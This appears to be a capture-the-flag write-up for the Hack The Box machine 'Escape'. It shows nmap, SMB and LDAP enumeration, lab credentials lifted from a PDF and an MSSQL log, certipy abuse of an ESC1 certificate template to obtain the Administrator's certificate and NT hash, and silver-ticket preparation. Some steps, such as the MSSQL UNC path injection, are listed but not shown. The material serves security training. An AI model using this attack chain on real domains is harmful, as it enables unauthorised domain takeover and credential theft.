A Windows machine created by Geiseric features techniques including:
Active Directory
MSSQL Server UNC Path Injection
Credentials Harvest
Misconfigured Certificate Templates
Silver Ticket Attack
Reconnaissance
Services Discovery
The port scanning result suggests that the target is a domain controller and we got an MSSQL server running on it.
Also, we may access the target remotely later via WinRM.
$ sudo nmap -n -p- -Pn -v -sS -T4 --min-rate 1000 10.129.140.112 -oN ports.nmap
...
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
...
RootDSE
We can use ldapsearch to get the domain name sequel.htb.
We can check the target's hostname dc.sequel.htb with dig.
$ dig @<target_ip> dc.sequel.htb
...
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;dc.sequel.htb. IN A
;; ANSWER SECTION:
dc.sequel.htb. 1200 IN A 10.129.140.112
SMB
It seems that the SMB null session authentication is enabled on the target.
$ smbclient -N -L \\\\10.129.140.112\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We can further enumerate the share Public using smbclient and found a PDF file SQL Server Procedures.pdf.
$ smbclient -N \\\\10.129.140.112\\Public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 11:51:25 2022
.. D 0 Sat Nov 19 11:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 13:39:43 2022
5184255 blocks of size 4096. 1446274 blocks available
SQL Server Procedures.pdf
We can learn a lot of information from the PDF file:
Domain name sequel.htb.
The target company cloned the DC mockup to a dedicated mock SQL instance for the test.
Users can authenticate to the MSSQL server using Windows authentication on a domain-joined machine.
Users on a non-domain-joined machine need to use cmdkey before authenticate to the MSSQL.
We can authenticate the MSSQL server with credential PublicUser:GuestUserCantWrite1 using SQL Server Authentication.
Some user names and emails including Ryan, Tom, Brandon, and brandon.brown@sequel.htb.
MSSQL
We can use Impacket-mssqlclient, which uses SQL server authentication by default, to login to the MSSQL server now.
$ ldapsearch -D sql_svc@sequel.htb -x -b 'dc=sequel,dc=htb' -H ldap://escape -w REGGIE1234ronnie
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
We can use the Python package ldap3 to do the LDAP query as the code of bloodhound.py.
import cmd, logging
from ldap3 import Server, Connection, NTLM, ALL, SASL, KERBEROS
logger = logging.getLogger(__name__)
class ldapsearch(cmd.Cmd):
def __init__(self, domain, user, passwd, ip):
super().__init__()
server = Server("ldaps://%s:3269" % ip, get_info=ALL)
self.conn = Connection(server, user=f"{domain}\\{user}", auto_referrals=False, password=passwd, authentication=NTLM)
logger.debug(f"bind={self.conn.bind()}")
def default(self, query):
self.conn.search(search_base='',
search_filter = query)
for entry in self.conn.response:
print(entry['dn'], entry['attributes'])
l = ldapsearch('sequel.htb', 'sql_svc', 'REGGIE1234ronnie', 'escape')
l.cmdloop()
We use bloodhound.py to collect AD information from the target.
We found an MSSQL log file C:\SQLServer\Logs\ERRORLOG.BAK.
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...
We see the user Ryan.Cooper type his password incorrectly and we can try to login to the target using this password now.
We see that the user Ryan is a member of the group Certificate Service DCOM Access member of which can connect to certification authorities in the enterprise.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
...
It seems that we may abuse the AD CS to achieve domain escalation.
Users obtain certificates from CA through the certificate enrollment process. Some misconfiguration may result in domain escalation.
We can use the tool Certify.exe to enumerate misconfigured certificate templates.
Or, we can use the Python package certipy to enumerate from Linux.
And, we can find a vulnerable certificate template named UserAuthentication:
$ python3 -m pip install certify-ad
$ certipy find -u 'ryan.cooper@sequel' -p 'NuclearMosquito3' -dc-ip 'escape' -vulnerable -stdout
...
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
...
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Certificate Signing Request
We can now use certipy to request the certificate for the user administrator now.
$certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Authentication
We can request the TGT ticket for the user administrator using certificate now.
$ sudo ntpdate -u escape
$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
And, we can login to the target using evil-winrm now.
Since we got the password of the service account SQL_SVC, we can mint a service-granting ticket for a non-existing SPN using the password hash as in a silver ticket attack.
First, we need the domain SID, in our case S-1-5-21-4078382237-1492182817-2568127209:
$ evil-winrm -u sql_svc -i escape -p REGGIE1234ronnie
...
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
sequel\sql_svc S-1-5-21-4078382237-1492182817-2568127209-1106
...
We also need the NT-hash 1443ec19da4dac4ffc953bca1b57b4cf:
from Cryptodome.Hash import MD4
from binascii import hexlify
password = 'REGGIE1234ronnie'
hash = MD4.new()
hash.update(password.encode('utf_16le'))
print(hexlify(hash.digest()).upper())
We can mint the TGS for the user Administrator using Impacket's ticketer with a non-existing SPN without touching the DC now.
